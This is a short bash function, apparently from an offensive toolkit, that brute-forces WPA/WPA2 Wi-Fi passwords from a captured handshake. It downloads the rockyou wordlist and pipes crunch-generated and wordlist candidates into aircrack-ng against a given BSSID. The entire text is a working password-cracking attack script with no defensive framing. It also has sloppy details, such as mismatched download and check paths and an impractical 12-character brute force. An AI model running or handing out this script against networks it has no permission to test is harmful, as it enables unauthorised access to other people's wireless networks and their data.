function crack_wpa2 ()
{
  ## Takes two parameters: crack_wpa2 <pcap file.cap> <BSSID>
  if [ -z $1 ]
  then
    exit 1
  fi
	local _wpa_file="$1"
	local _bssid="$2"
	test ! -f ~/rockyou.txt && wget -c https://github.com/danielmiessler/SecLists/raw/master/Passwords/rockyou.txt.tar.gz
	tar -xf rockyou.txt.tar.gz
	msg "Cracking WPA/WPA2-PSK...." 0
	crunch 8 8 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&-+='|shuf |aircrack-ng -w - -b ${_bssid} ${_wpa_file}
	crunch 12 12 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&-+='|shuf |aircrack-ng -w - -b ${_bssid} ${_wpa_file}
	msg "Section: 2" 0
	cat rockyou.txt| pw-inspector -m 8 -M 16 |shuf |aircrack-ng -w - -b ${_bssid} ${_wpa_file}
	msg "Section: 3" 0
	crunch 8 8 -f charset.txt numeric  | pw-inspector -m 8 -M 16 |shuf  |aircrack-ng -w - -b ${_bssid} ${_wpa_file}
	msg "Section: 4" 0
	crunch 8 8 -f charset.txt mixalpha-numeric|shuf  |aircrack-ng -w - -b ${_bssid} ${_wpa_file}
	msg "Section: 5" 0
	crunch 12 12 -f charset.txt numeric  | pw-inspector -m 8 -M 16 |shuf  |aircrack-ng -w - -b ${_bssid} ${_wpa_file}
	msg "Section: 6" 0
	crunch 12 12 -f charset.txt mixalpha-numeric|shuf  |aircrack-ng -w - -b ${_bssid} ${_wpa_file}
	msg "Section: 7 - Completed." 0
	msg "WPA/WPA2-PSK brute force completed."
}
